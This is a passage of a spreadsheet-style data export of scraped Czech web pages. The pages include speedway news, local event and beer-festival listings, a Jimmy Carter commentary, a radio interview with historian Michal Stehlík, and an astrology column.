    <t>Prosinec Archiv pro měsíc: Prosinec 2024 Nezařazené 31.12.2024 Silvestr 2024 Nedávná přepadová kontrola špiček CCP FIM v Praze odhalila na stadiónu jeden nedostatek. Pavel Fišer jej dokázal zvěčnit a jeho snímek dává najevo, o jakou malichernost jde. Dráha o licenci nepřijde a na konci března zde odstartuje domácí plochodrážní sezóna. Ale zatím veselého Silvestra. Pavučina nezabrání startu nové sezóny | foto Pavel Fišer 31.12.2024 Silvestr 2024 Plochodrážní magazín potřebuje přece jen pro své reportáže především dokumentární fotografie. Ale fotografové přece jen čas od času podlehnou svůdným můzám a zkusí si umělecké snímky. Karel Herman není výjimkou. A vskutku, některé jeho snímku doopravdy donutí člověka přemýšlet, co nám mistr Nikonu chtěl o sportu levých zatáček vlastně sdělit. 31.12.2024 Silvestr 2024 Pravda, klobásy, steaky a pivo na českých plochodrážních stadiónech bývají vesměs výtečné. Při pohledu na snímek Karla Hermana by nezasvěcený nabyl dojmu, že Josef Özelt kvůli svodům tohoto světa zapomněl na dění na ovále. Jenže rakouský funkcionář dobře ví, že u nás je echt také speedway, a proto sem pravidelně jezdí. Při závodech člověku vyhládne | foto Karel Herman 31.12.2024 Silvestr 2024 Módním šlágrem plochodrážní sezóny anno domini 2024 je prostě růžová. V minulosti nepříliš užívaná barvy na kombinézách a dečkách českých plochodrážníků se stala hitem díky Adamu Bubbovi Bednářovi. Určitě se líbí i Pavlu Ondrašíkovi , jak by se mohlo zdát ze snímku Petra Makuševa. Nicméně pravda je taková, že sportovní ředitel pražské Markéty nepřiložil ruku k dílu, aby se dostal do realizačního týmu nejlepšího českého juniora. I nadále zachovává věrnost modré. Pavel Ondrašík rozhodně nebude mechanikem Adama Bubby Bednáře | foto Petr Makušev (Sport Photo) 30.12.2024 Hlavní sezóna fuč, do nové daleko a klimatické otazníky spojené s ledovou dráhou. Takové je plochodrážní rozpoložení v kontinentální Evropě na samém konci roku. Přesto poslední pondělí s pětadvacítkou na konci letopočtu přichází s tradiční kompilací magazín speedwayA-Z. Jan Kvěch se totiž po Vánocích vypravil k Protinožcům. V sobotu se v Gillmanu konal mítink o medaili Leigha Adamse, který byl přímo na stadiónu přítomen. Stal se kořistí Jacka Holdera, za nímž projeli cílem finále Chris Holder, Jan Kvěch (2 1 1 3 3 + první v poslední šanci) a Jaimon Lidsey. Včera Jan Kvěch skončil sedmý (0 3 2 0 3) v Milduře při podniku Phil Crump Solo Classic. Na stupních vítězů stáli Brady Kurtz, Jaimon Lidsey a Luke Becker. Jack a Chris Holderovi s Janem Kvěchem ve společnosti Leigha Adamse | foto laskavostí Jana Kvěcha Navigace pro příspěvky 1 2 … 6 Další → NOVINKY Když už známe sestavy, položme si znovu stejnou otázku - kdo bude vítězem extraligy? Žarnovica Antonín Škach - Angličtina v České Třebové Habrmanova 1895</t>
  </si>
  <si>
    <t>20250101_413_4049083093_ef136296c3a92699fe40.html</t>
  </si>
  <si>
    <t>ef136296c3a92699fe40</t>
  </si>
  <si>
    <t>Co Po 3.3.2025 - Pá 7.3.2025, 13:00 Zažehlovací korálky Po 3.3.2025 - Pá 7.3.2025, 13:00 Plastelínová přání Po 3.3.2025 - Pá 7.3.2025, 13:00 Jarní záložky Autor: Město Bohumín</t>
  </si>
  <si>
    <t>20250101_414_4049077549_27cfcc34e94b3590bf24.html</t>
  </si>
  <si>
    <t>27cfcc34e94b3590bf24</t>
  </si>
  <si>
    <t>Co Po 10.3.2025 - Pá 14.3.2025, 13:00 Malujeme vodovkami Út 11.3.2025 - Pá 14.3.2025, 13:00 Zažehlovací korálky Autor: Město Bohumín</t>
  </si>
  <si>
    <t>20250101_415_3692518376_2da1b6d0571eae2300ba.html</t>
  </si>
  <si>
    <t>2da1b6d0571eae2300ba</t>
  </si>
  <si>
    <t>Šťastný nový seriálový rok 2025!</t>
  </si>
  <si>
    <t>Šťastný nový seriálový rok 2025! Dnes slavíme poslední den roku 2024! A zítra už bude datum končit pětkou, to je neskutečné, jak ten čas letí! Pojďte si spolu s námi přiťuknout skleničkou šampaňského, vína , džusu, nebo třeba kakaa. Jménem SerialZone vám přeji jen to nejlepší do roku 2025, spoustu zdraví, lásky, peněz, štěstí a času na oblíbené seriály. Všem redaktorům a aktivním uživatelům přeji pevné nervy a bohaté nápady, energii a radost z obohacování našeho webu. Máme tady tisíce seriálových profilů, nespočet osobností, fotografie, zajímavosti, hudbu, hlášky, články, kvízy, hry… všem, kteří se na jejich tvorbě podílí, chci moc poděkovat za odvedenou práci. Bez vás bychom zdaleka nebyly tak daleko, jak jsme teď, a nebylo by nám tady s vámi tak dobře. Pro ostatní návštěvníky mám připravené přání především toho, ať se vám tady u nás pořád tak líbí, ať k nám opakovaně chodíte, abyste si udržovali přehled o oblíbených i jiných seriálech a bavili se u našich soutěží a her. Můj rok Všichni registrovaní uživatelé mají na svém profilu k dispozici kompletní statistiky své seriálové aktivity v záložce Můj rok v menu svého profilu. Každý z vás si může vybrat, zda chce mít statistiku veřejně přístupnou pro ostatní návštěvníky profilu, nebo si ji nechá skrytou. Statistika každého uživatele má svůj jedinečný kód v adrese, pokud se tedy chcete pochlubit, jak jste si vedli co do počtu zhlédnutých dílů, ohodnocených seriálů a dalších sledovaných údajů, hoďte odkaz na svůj přehled do diskuze. Vykopávám! Seriálová výzva Abyste měli dostatek času ohodnotit všechny prosincové viděné seriály a doplnit chybějící políčka do výzvy pro rok 2024, dáváme vám ještě týden k dobru. Další týden vám přineseme vyhodnocení, statistiky, trofej a představíme novou výzvu pro rok 2025! Jak jste spokojení se svými statistikami za uplynulý rok? Budete se seriály pokračovat i letos? Jaké novinky byste rádi viděli na našich stránkách? Podělte se o své statistiky, názory a postřehy v komentářích! Já rád sdílím, on rád sdílí, ty rád sdílíš! Všem všechno nejlepší v Novém roce 2025!:) před 6 dny Trochu později, nicméně šťastný nový rok! před 6 dny I já přeji, i když se zpožděním vše nej nej nej do nového roku! před 6 dny Autor: SerialZone.cz – nejzábavnější seriálový web</t>
  </si>
  <si>
    <t>9340</t>
  </si>
  <si>
    <t>20250101_416_3692510475_d3c0cce922a9ae6b3367.html</t>
  </si>
  <si>
    <t>d3c0cce922a9ae6b3367</t>
  </si>
  <si>
    <t>Pivní slavnosti Tábor</t>
  </si>
  <si>
    <t>Pivní slavnosti Tábor 49.4131805 14.666641000000027 Datum / čas Date(s) - 27.03.2025 - 29.03.2025 16:00 - 23:59 Místo konání Wellness &amp;amp; spa Hotel Palcát Kategorie Zveme vás na PIVNÍ SLAVNOSTI PALCÁT TÁBOR 2025, které se budou konat již tradičně v prostorách hotelu Palcát ve dnech 27. – 29. 3. 2025. Pivo budete moci ochutnat od 20 pivovarů z celé České republiky a také se můžete těšit na bohatý doprovodný a kulturní program. Vystoupí kapely: čtvrtek: Big Papa, Siluety pátek: POPŘECHODU, Náhodný Výběr, UDG sobota: Parkán , Tlustá Berta, Argema Akcí bude provázet moderátor Vladislav Slezák. Těšit se můžete na několik pivních soutěží. Aktuality bude též možno sledovat na naší webové stránce www.pivnislavnostitabor.cz, kam budeme také postupně zveřejňovat zúčastněné pivovary! Aktuality: Volba sládků Plzeňského Prazdroje Brut IPA - alk.: 7 % slad plzeňský chmely Sabro, Amarillo , Simcoe Hořkost: 32 Barva: 9. on 07/01/2025 Minipivovar Rampušák Dobruška Rampušák Winter Ale 13 s chmely El Dorado, Centennial a Apollo. on 07/01/2025 Pivovar Rampušák Dobruška Winter ale 13 - chmely El Dorado, Centennial a Apollo. on 07/01/2025 Cobolis Praha Zlatá horečka 13 - brut IPA. on 07/01/2025 Topolský pivovar Topolná</t>
  </si>
  <si>
    <t>351</t>
  </si>
  <si>
    <t>20250101_417_3692510072_366f17364769ba2237d3.html</t>
  </si>
  <si>
    <t>366f17364769ba2237d3</t>
  </si>
  <si>
    <t>VIII. vinařský ples Hrušky (Vinařské akce, Ostatní)</t>
  </si>
  <si>
    <t>VIII. vinařský ples Hrušky (Vinařské akce, Ostatní) Zobrazit rozložení bodů 'stobodovky' 13. 12. 2024 „Tohle je svým způsobem jedinečný kousek. Rýňák, který jakoby popíral sám sebe a přesto je komplexní a skvělý. Toto víno mne baví.“ /100 12. 5. 2024 „Matná pomerančová barva s lehkým závojem přírodního nefiltrovaného vína , oranžově zářícími odlesky a výraznou viskozitou. Bohatá, čistá, intenzivnější, nazrálá kořenitá vůně s tóny propolisu, včelího vosku, kandované pomerančové kůry, mandarinkového kompotu a sušené hrušky, s jemným nádechem evokujícím skořicovou kůru. Plnější, harmonicky vyzrálá, suchá chuť přináší v jemných dotecích vše z vůně, s výraznější stopou propolisu, sušené hrušky a koření, podpořena příjemnou ovocnou kyselinkou a delikátní adstringencí. Velmi dlouhý, kořenitý závěr.“ Autor: MojeLahve.cz</t>
  </si>
  <si>
    <t>20250101_418_3692510066_dc381e071f8dfa7d0df2.html</t>
  </si>
  <si>
    <t>dc381e071f8dfa7d0df2</t>
  </si>
  <si>
    <t>Kostelecké chmelovárek</t>
  </si>
  <si>
    <t>Kostelecké chmelovárek mapa není k dispozici Datum / čas Date(s) - 15.03.2025 10:30 - 23:45 Místo konání Sokolovna Kostelec u Holešova Kategorie 16. ročník mezinárodní konference amatérských sládků 10:30 – 17:00 odborná část pro aktivně vařící domovarníky 17:30 – 24:00 pokračování pro laickou veřejnost Jako vždy se můžete těšit na bohaté občerstvení, více než 50 piv všech stylů z nejlepších pivovarů z okolí i z dáli na deseti výčepech a blok zajímavých přednášek nejen o pivu , živou diskuzi s kolegy ze všech koutů vlasti a přilehlého okolí a bohatou nabídku pochutin. Jako doplněk konference proběhne tradiční degustační soutěž o GRAND PRIX Kostelce u Holešova . v těchto kategoriích: . A) Světlé pivo spodně kvašené, bez rozdílu stupňovitosti. – výsledky vzorků splňujících kategorizaci BJCP 3B budou započítány do Ligy českého ležáku – maximální kapacita kategorie – 90 vzorků B ) Tmavé a polotmavé pivo spodně kvašené, bez rozdílu stupňovitosti. – maximální kapacita kategorie – 60 vzorků C) Svrchně kvašené pivo bez významného podílu pšenice, bez rozdílu stylu (mimo stout a porter). – maximální kapacita kategorie – 90 vzorků D) Svrchně kvašené pivo pšeničné. – maximální kapacita kategorie – 30 vzorků E) Pivo typu stout a porter. – maximální kapacita kategorie – 50 vzorků F) Nakuřované pivo bez rozdílu stylu a kvasnic. – maximální kapacita kategorie – 30 vzorků Q) Kyseláče. – maximální kapacita kategorie – 30 vzorků Do každé kategorie může účastník přihlásit jeden vzorek Startovné je stanoveno na 100,- za jeden vzorek Požadovaná kubatůra – 2 láhve 0,5 nebo 0,3l Láhve by měly být čisté bez etikety. Štítek vygenerovaný registračním systémem bude na láhvi připevněn gumičkou (gumičkami) tak, aby šel bez nesnází jednoduše odstranit. Aktuality: Kiwie 11 - hazy APA. Postaveno na novozélandských chmelech Motueka a Nelson Sauvin. on 08/01/2025 Minipivovar Rotor Kunovice Medový let 12 - honey ginger ale. on 08/01/2025 Pivovar Malý Janek Jince Irčan 13 - stout s kávovými tóny. on 08/01/2025 Pivovar Malenovice Bohemie 11 - světlý ležák se stejnojmennou odrůdou chmele, která má v původu i Žatecký poloraný červeňák. Její aroma je mírně kořenité a chmelové. on 08/01/2025 Topolský pivovar Topolná</t>
  </si>
  <si>
    <t>20250101_419_3692512029_bd1b62c5493a9101d751.html</t>
  </si>
  <si>
    <t>bd1b62c5493a9101d751</t>
  </si>
  <si>
    <t>Jimmy Carter, prezident, který se snažil</t>
  </si>
  <si>
    <t>Jimmy Carter , prezident, který se snažil KOMENTÁŘ Jimmi Carter - tento osobně hodný, čestný a morální člověk je důkazem, že tyto kvality nejsou nutné pro vykonávání nejmocnějšího úřadu na planetě, píše Ondřej Šmigol. Foto: Wikipedia.org USA prezident Související články Týdeník Echo Týdeník Echo EchoPrime Jimmy Carter , který zemřel před třemi dny ve věku sta let, se stal synonymem pro neúspěšné prezidentství. Tento osobně hodný, čestný a morální člověk je důkazem, že tyto kvality nejsou nutné pro vykonávání nejmocnějšího úřadu na planetě. Naopak mohou být na škodu. Původně pěstitel buráků z Georgie a učitel v nedělní škole vystoupal do Bílého domu, protože byl znechucen ze skandálů a z korupce, které provázely administrativu Richarda Nixona . Cartera Američané zvolili hlavně díky jeho slibu, že „vyčistí Washington “. Místo toho dorazila ekonomická krize, obří inflace, na vrcholu dosáhla 13,5 %, a energetický šok. Cena benzinu se zdvojnásobila. Nepomohlo, že Carter měl neobvykle špatné vztahy s Kongresem, přestože byl ovládán jeho stranou, demokraty. Politika tak byla zablokovaná. Carter se nesnášel s předsedou Sněmovny reprezentantů Tipem O’Neillem, kterého urazil, když mu na pracovní snídani naservíroval sušenky s kávou místo vajec se šunkou. Bylo to projevem Carterova moralizování. Neschopný najít řešení na stagflaci a další problémy vyzýval Američany k uskrovnění a změně životního stylu. Radil jim méně topit a navléct svetry. Sám šel příkladem, když zakázal servírování tvrdého alkoholu na recepcích a instaloval solární panely na střechu Bílého domu. Vrcholem se stal jeho televizní projev 15. července 1979, který vešel do historie jako „malátná řeč“. V ní provedl sebekritiku. Zároveň ale prohlásil, že nynější problémy nemají jednoduchá řešení. Největším ohrožením americké demokracie dle něj byla „krize důvěry“. „Je to krize, která zasahuje samotné srdce, duši a ducha naší národní vůle. Tuto krizi můžeme vidět v rostoucích pochybnostech o smyslu vlastního života a ve ztrátě jednotného cíle našeho národa,“ prohlásil. Příliš s tím nepochodil. I když bezprostředně po projevu jeho popularita stoupla, dlouhodobé naznačování, že USA již mají nejlepší časy za sebou, se ukázalo jako politická katastrofa. Nejdříve Cartera vyzval na souboj v primárkách demokratický senátor Ted Kennedy . „Nyní jsou lidé obviňováni ze všech národních nemocí, nadává se jim, že jsou chamtiví, marnotratní a že se utápějí v neduzích,“ kritizoval Cartera . Pak ho v hlavním klání rozdrtil Ronald Reagan . „Někteří lidé tvrdí, že naše energie je vyčerpána, že dny naší velikosti jsou u konce, že na nás dolehla velká národní nemoc. Říkají, že musíme omezit svá očekávání, šetřit a stáhnout se, že musíme svým dětem říct, aby nesnily tak, jako jsme kdysi snili my,“ nabídl optimistickou vizi Reagan . Ve volbách v roce 1980 vyhrál 44 států z 50. V zahraniční politice si Carter nevedl o mnoho lépe. Pokračoval v politice détente ve slepé víře, že se Sovětským svazem se jde nějak dohodnout. Největší krizí jeho prezidentství se ale stali rukojmí v Íránu . V rámci íránské revoluce dav radikálů vnikl v listopadu 1979 na americkou ambasádu v Teheránu a zajal 66 rukojmích. Snaha je osvobodit ve speciální operaci žalostně selhala, stejně tak vyjednávání o jejich osvobození. V zajetí strávili 444 dní, íránský režim je propustil na začátku Reaganova prezidentství. Výsledkem byl obraz Cartera jako slabocha, na kterého si každý dovolí. Nepomohl tomu incident z Carterova rybaření doma v Georgii, kdy na něj zaútočil zajíc. Carterovo odhánění hlodavce pádlem jeho image moc nepřidalo. Pár úspěchů lze ale Carterovi přiznat. Po sovětské invazi do Afghánistánu prozřel a započal tvrdý kurz a dekádu americké konfrontace s SSSR , jež pomohla pádu východního bloku. V domácí politice proslul jako velký deregulátor, jenž uvolnil pravidla ohledně letecké, nákladní a železniční dopravy, telekomunikací i piva . Carter je tak považován za otce rozkvětu amerických minipivovarů a levných letů. Vyjednal dohody z Camp Davidu, které vedly k míru mezi Egyptem a Izraelem . Také jmenoval šéfem Fedu, americké centrální banky, Paula Volckera , který svým skokovým zvyšováním úrokových sazeb dokázal během Reaganovy administrativy konečně zkrotit inflaci. Carter byl prezident, který to myslel dobře. Příliš úspěchů s tím ale neměl. Tereza Matějčková , 1. ledna 2025 BEST OF ECHO 2024 Markéta Malá , 29. prosince 2024 SPECIÁL BEST OF ECHO 2024 Obsah tohoto článku je dostupný pouze pro předplatitele, a proto jej nevidíte celý. digitální Týdeník Echo plná verze autorských Podcastů denní komentáře na Echo24.cz EchoPrime Echo24.cz bez reklam Vše si pak můžete užívat na 5 zařízeních. Autor: Ondřej Šmigol Autor Ondřej Šmigol Rubrika transition_slide Komentáře</t>
  </si>
  <si>
    <t>20250101_42_3697449615_b5d37c385bc7717c3fec.html</t>
  </si>
  <si>
    <t>b5d37c385bc7717c3fec</t>
  </si>
  <si>
    <t>V kreativitě a uměleckém výkonu jsou Češi srovnatelní se zbytkem Evropy. Máme mimořádný tvůrčí potenciál, říká historik Michal Stehlík</t>
  </si>
  <si>
    <t>V kreativitě a uměleckém výkonu jsou Češi srovnatelní se zbytkem Evropy . Máme mimořádný tvůrčí potenciál, říká historik Michal Stehlík „Literatura je v našich dějinách a kultuře vnímána jako něco významného, jako spoluurčující naši identitu,“ říká historik a ředitel Památníku národního písemnictví Michal Stehlík. Jak hodnotí svůj první rok ve funkci? Daří se mu instituci oživit? A za jakých okolností přišel na svět podcast Přepište dějiny? Poslechněte si rozhovor. Jaké je poslání Památníku národního písemnictví, potažmo Muzea literatury? Čtěte také Když se neomluvíme, navždy hledíme na svět optikou naší viny, říká spisovatel a novinář Milan Tesař Těch poslání je několik. V základu je určitě tzv. sbírkotvorná nebo archivní činnost. Jsme tu od toho, abychom zachovali především literární památky – ve smyslu pozůstalostí spisovatelů, institucí, nakladatelství – a vedle toho výtvarné památky, které z velké části souvisí s literaturou. Jsou zde úžasné materiály od raného Josefa Lady přes Josefa Čapka , v našem depozitáři najdete Toyen i Štyrského nebo Zdeňka Buriana . To jsou opravdu cenné věci. Literatura je v našich dějinách a kultuře samozřejmě vnímána jako něco významného, jako spoluurčující naši identitu. A v tento moment to musíme začít jinak komunikovat. Naše poslání je uchovat a sbírat a být i na tepu doby v rámci aktuální spisovatelů, ale vedle toho také prezentovat. To znamená, že jeden z těch hlavních cílů je ukazovat literaturu v širším kontextu kultury, výstav. Někde za tím se skrývá edukace – protože ke komu jinému z hlediska čtenářství, literatury, příběhů a osudů mluvit než k nové generaci? Ředitelem této instituce jste přesně rok. Po nástupu do funkce jste na stanici Vltava řekl, že se Muzeum literatury musí oživit. Už se to daří? Za mě se to určitě daří, ale to neznamená, že jsme spokojení a bude to pořád stejné. Připravili jsme nový dramaturgický plán výstav. Teď lze pozvat posluchače na skvělou výstavu originálů Rychlých šípů z prvního Mladého hlasatele mezi léty 1938 a 1941. Vystavujeme naprostý unikát – můžete nahlédnout pod ruce Jaroslavu Foglarovi a Janu Fischerovi . Čtěte také Rychlé šípy mohou zprostředkovat mezigenerační dialog. Dobrodružství u dětí pořád funguje, říká skautský historik Během roku 2024 se připravila skvělá kafkovská výstava, která má aktuálně úspěch v Mnichově , kam jsme ji vyvezli. Ale hlavně oživujeme dramaturgii akcí. Několikrát za týden můžete přijít do Muzea literatury na čtení od baroka přes aktuální spisovatele, na diskuse... A to kombinujeme s divadly a performance. Už jsem zmínil Festival tří vil, který opět v září bude. Do toho připravujeme zcela nové programy zejména pro školy a pro děti, kdy jdeme od předškoláků až k celoživotnímu vzdělávání. Němečtí spisovatelé patří k Praze , patří k českému a moravskému prostoru. Tímto vším, což je samozřejmě nesmírný objem práce, chceme oživovat, chceme se otvírat. Myslím, že se nám to daří, a v roce 2025 v tom budeme pokračovat. Mezi naše největší projekty bude patřit výstava na téma Revolver Revue, což je ohlédnutí se za koncem 80. let až k dnešku, a na konci roku – protože jsme trochu obětí výročí v literatuře – bude velká výstava na téma Rainer Maria Rilke a Praha , kdy chceme akcentovat, že jsme sice Památník národního písemnictví, ale to „národní“ nemusí být pouze český národ. Třeba němečtí spisovatelé patří k Praze , patří k českému a moravskému prostoru. Dvě a půl hodiny dotazů Michal Stehlík je muž, kterého když unaví profese historika a řízení Muzea literatury a Památníku národního písemnictví, uchýlí se ke svému koníčku, a tím je opět novodobá historie. Jak jste si v adventním čase užil debatu v Rock Café v rámci projektu Přepište dějiny? Čtěte také Stehlík: Naše děti čekají těžké časy. Jsme nepoučitelní, to je jedna z vlastností, která v dějinách funguje Bylo to hodně mimořádné. Přepište dějiny obecně mají za sebou přes 300 dílů, natáčení různých témat o soudobých dějinách, přes stovku výjezdů do regionů, kde akcentujeme regionální dějiny, ale tady jsme si s kolegou Martinem Gromanem udělali radost sami sobě. Ten speciální díl byl o Antonínu Zápotockém a Františku Krieglovi, které občas zmiňujeme. Řekli jsme si, že těch 90 minut s návštěvníky našeho vystoupení bude fajn. Po dvou a půl hodinách jsme se vypotáceli z Rock Café, protože téměř jednou tolik zabraly dotazy a diskuse na téma role osobnosti v dějinách, konkrétně o těch dvou. Takže jsme si to velmi užili a ještě jsme vzali do hry moji dceru Viktorii , která četla text Rivy Krieglové a Marie Zápotocké, aby tam byl i ženský prvek, abychom jenom moudře nemudrovali nad mužskými historickými osudy. Kdo a kdy s nápadem na tento dnes velmi populární podcast přišel? Čtěte také Kriegel chtěl Únor tvrdý, prosazoval revoluci se vším všudy, říká historik Groman Je to společné. Bylo léto, takový složitější covidový čas, otvírání a zavírání lockdownů... Sedíme u Martina Gromana na Vysočině a u x-té lahve vína si říkáme, že si zkusíme 10 dílů podcastu, jenom si popovídáme o dějinách a pak toho necháme. No, teď máme přes 300 dílů. Takže to byla chalupa na Vysočině v létě 2020. Rozhovor vysíláme 1. ledna, což je Den obnovy samostatného českého státu. Z čeho čerpat zdravé národní sebevědomí? Není to poprvé, co se nad tím za poslední dobu člověk takto zamýšlí, protože společnost řeší hodně identitu – co jsme a proč jsme. Velmi často se i skrze literaturu dobírám k tomu, že zdravé národní i vlastenecké sebevědomí společnosti, ve které žijeme, je nesmírně silná kulturní tradice. A hlavně máme mimořádný tvůrčí potenciál, který ne vždy využíváme. Trošku zahlížívě na naše dějiny říkám, že by bylo fajn, kdyby se naše schopnost improvizovat změnila v dlouhodobou kreativitu. To bychom mohli vést celou Evropu . Byl bych na to byl hrdý z hlediska minulosti, a to nemusíme říkat jména, jako je Čapek a Kundera a další. Ta silná tradice, kdy vidíme, že jsme srovnatelní se světem, s Evropou v kreativitě a uměleckém výkonu, je, myslím, hodně důležitá a vztahovali jsme se k tomu v minulosti. A nebylo to tak úplně falešné, takže bych se toho držel i dále. Jak vyhledávané je Muzeum literatury běžnými návštěvníky? Co ukazuje expozice Rozečtený svět? A jak se Michal Stehlík coby bývalý předseda Rady ČRo dívá na aktuální diskuze o poplatcích a smyslu médií veřejné služby? Poslechněte si celý rozhovor! Autor: Tomáš Kremr, Vladimír Kroc Autoři Tomáš Kremr Vladimír Kroc Rubrika transition_slide Host Radiožurnálu</t>
  </si>
  <si>
    <t>20250101_420_3692520574_75978ab8dcd4ba70c503.html</t>
  </si>
  <si>
    <t>75978ab8dcd4ba70c503</t>
  </si>
  <si>
    <t>Venuše v Rybách 2025: přináší období plné emocí a snů</t>
  </si>
  <si>
    <t>Venuše v Rybách 2025: přináší období plné emocí a snů Facebook Twitter Pinterest Email 3. ledna se Venuše usadí v Rybách. Ryby jsou posledním znamením zvěrokruhu a představují konce. Přináší realitu, která přesahuje formu a zahrnuje věci, které oči nevidí a mysl těžko chápe. V Rybách se Venuše ponoří do světa emocí, snů a nekonečných možností. Tento tranzit přináší věci, které nestojí na hmatatelných činech a jasných slovech, ale na tichém porozumění. S Venuší v Rybách vyvrcholí vaše vztahy a přinesou řešení případných neshod. Zůstanete nebo půjdete dál. Řekněte vše nevyřčené. Nic nezatajujte a neskrývejte. Už žádné úniky. Mohou se zdát na první pohled pohodlné, ale přinesou jen další zmatek. Nastavte si pevné hranice. Venuše v Rybách nám pomůže se otevřít a být k sobě upřímní. Je potřeba si vše přiznat, abychom to mohli pochopit. Venuše v Rybách nás učí lásce a odevzdání se. Stírá hranice mezi realitou a sny. Otevřete své srdce a nechte se vést svými pocity. Velký tlak emocí může někdy být těžké zvládnout a ustát. I když jste hlavou v oblacích, pokuste se zůstat nohama na zemi. Inspirujte se svými sny, ale neztrácejte své spojení s realitou. Snažte se s důvěrou zpracovat své pocity, ale nenechte se jimi zcela ovládat. Nepřebírejte emoce druhých. Stanovte si své hranice. Další vlivy pro období Venuše v Rybách 14. ledna je Venuše v kvadrátu s Jupiterem ve zpětném chodu. Čekejte turbulence ve vztazích. Ukáže se, které vztahy fungují, a které ne. 18. ledna je Venuše v konjunkci k Saturnu v Rybách. Využijte produktivně tento klidný den. 25. ledna je Venuše v trigonu s Marsem ve zpětném chodu v Raku. Další příjemný den. 29. ledna je novoluní ve Vodnáři a začíná čínský Nový rok dřevěného hada 1. února je Venuše v konjunkci s Neptunem v Rybách. Je to den Ryb a kolotoč emocí. Buďte opatrní a dávejte si pozor na alkohol . 4. února se Venuše přesune do Berana a přinese četstvou energii a nový začátek. Připravila: Věra Hájková Zdroj informací: astrotalk.com, astrostyle.com, astrology.com Zdroj fotografií: Freepik Scaled Přidejte si MeziŽenami.cz na hlavní stránku Seznam.cz. Diskuze: příspěvků Autor: Kateřina Soušková Autor person Kateřina Soušková</t>
  </si>
  <si>
    <t>10270</t>
  </si>
  <si>
    <t>20250101_421_3707319722_403409bd91fb2913e031.html</t>
  </si>
  <si>
    <t>403409bd91fb2913e031</t>
  </si>
  <si>
    <t>KALENDÁR ˇ AKCÍ KINO 3. LEDNA, 20:00 JEŽEK SONIC 3 4. LEDNA, 20:00 LOVEC KRAVEN 5. LEDNA, 10:00 DOPOLEDNÍ PROMÍTÁNÍ MUFASA: LVÍ KRÁL 8. LEDNA, 19:00 V DOBRÉM I ZLÉM 9. LEDNA, 19:00 AGENTI ŠTĚSTÍ 10. LEDNA, 20:00 VLNY 11. LEDNA, 20:00 LÉTO S EVŽENEM 12. LEDNA, 15:00 JEŽEK SONIC 3 15. LEDNA, 10:00 DOPOLEDNÍ PROMÍTÁNÍ POKLAD 15. LEDNA, 19:00 KOČIČÍ ODYSEA 16. LEDNA, 19:00 ZA OPONOU VELEHOR 17. LEDNA, 20:00 MUFASA: LVÍ KRÁL 18. LEDNA, 20:00 V DOBRÉM I ZLÉM 19. LEDNA, 15:00 BOB A BOBEK VE FILMU: NA STOPĚ MRKVOJEDA 21. LEDNA, 18:00 CESTOPISNÁ PŘEDNÁŠKA NAŠE HŘEBENOVKA 22. LEDNA, 19:00 VANDRÁCI NA OSTROVĚ LIDOJEDŮ 23. LEDNA, 19:00 SAINT-EXUPÉRY 24. LEDNA, 20:00 NA PLECH 25. LEDNA, 20:00 ZLATOVLÁSKA 26. LEDNA, 15:00 ODVÁŽNÁ VAIANA 2 29. LEDNA, 10:00 DOPOLEDNÍ PROMÍTÁNÍ VLNY 29. LEDNA, 19:00 BOB DYLAN : ÚPLNĚ NEZNÁMÝ 30. LEDNA, 19:00 JEŽEK SONIC 3 31. LEDNA, 20:00 ZLATOVLÁSKA DIVADLO 15. LEDNA, 19:00, DIVADELNÍ PŘEDSTAVENÍ S TVOJÍ DCEROU NE 16. LEDNA, 19:00, KONCERT KOUZLO KLARINETU 18. LEDNA, 15:00, DIVADELNÍ PŘEDSTAVENÍ PRO DĚTI TOMÍK MEZI DINOSAURY 23. LEDNA, 19:00, DIVADELNÍ PŘEDSTAVENÍ SVATBA BEZ OBŘADU PLESY 1. ÚNORA, SÁL ZŠ STUDENTSKÁ HASIČSKÝ PLES (SDH BŘEZINA) 8. ÚNORA, SÁL ZŠ STUDENTSKÁ XVI. REPREZENTAČNÍ PLES MĚSTA MNICHOVO HRADIŠTĚ 22. ÚNORA, SÁL ZŠ STUDENTSKÁ PLES SDH MNICHOVO HRADIŠTĚ KLUB DĚTÍ A MLÁDEŽE 7. LEDNA, 17:00 AŽ 19:00 KERAMICKÁ DÍLNA PRO VEŘEJNOST 7. A 21. LEDNA, 17:15 AŽ 21:15 VEČER S DUNGEONS &amp;amp; DRAGONS 11. LEDNA, 9:00 AŽ 13:00 KURZ ŠITÍ PRO DĚTI I DOSPĚLÉ 31. LEDNA, 7:30 AŽ 16:00 POLOLETKY V KLUBU 6., 13., 20. A 27. LEDNA, 9:00 AŽ 11:00 PONDĚLNÍ DOPOLEDNÍ HERNIČKA 7., 14., 21. A 28. LEDNA, 9:00 AŽ 11:00 KLUB SLUNÍČKO 8., 15., 22. A 29. LEDNA, 9:00 AŽ 11:00 MINIŠKOLKA 2 (STŘEDA) 9., 16., 23. A 30. LEDNA, 9:00 AŽ 11:00 KLUB KORÁLEK 9., 16., 23. A 30. LEDNA, 9:00 AŽ 11:00 DOPOLEDNÍ KERAMICKÝ KLUB 10., 17. A 24. LEDNA, 8:30 AŽ 11:30 MINIŠKOLKA 3 (PÁTEK) CENTRUM NÁRUČ 7., 14., 21. A 28. LEDNA, 11:00, VOLNOČASOVÉ CENTRUM KONVERZACE S RODILOU MLUVČÍ 17. LEDNA, 10:00, VOLNOČASOVÉ CENTRUM NA SLOVÍČKU S DULOU 21. LEDNA, 17:00, VOLNOČASOVÉ CENTRUM ŠICÍ DÍLNA 28. LEDNA, 17:00, VOLNOČASOVÉ CENTRUM PORODNÍ VEČÍREK OSTATNÍ DO 28. ÚNORA 2025, NÁBYTEK HONZA ( VÍTA NEJEDLÉHO 1299) VÝSTAVA FOTOGRAFIÍ, KRESEB A GRAFIKY M. BACHOVÉ 5. LEDNA, 15:00, MASARYKOVO NÁMĚSTÍ, FARSKÁ ZAHRADA TŘÍKRÁLOVÝ PRŮVOD 14. LEDNA, 17:30, DŮM LUDMILA, VESELÁ, NA NÁVSI 229 SCHŮZKA MNICHOVOHRADIŠŤSKÉHO SPOLKU GENEALOGŮ 15. A 29. LEDNA, 15:00, ZASEDACÍ MÍSTNOST MĚSTS. ÚŘADU KONZULTACE ARCHITEKTA MĚSTA S VEŘEJNOSTÍ</t>
  </si>
  <si>
    <t>20250101_422_3730294637_5a7fa9f84e3052d3be78.html</t>
  </si>
  <si>
    <t>5a7fa9f84e3052d3be78</t>
  </si>
  <si>
    <t>Vánoce na desítce byly opět kouzelné</t>
  </si>
  <si>
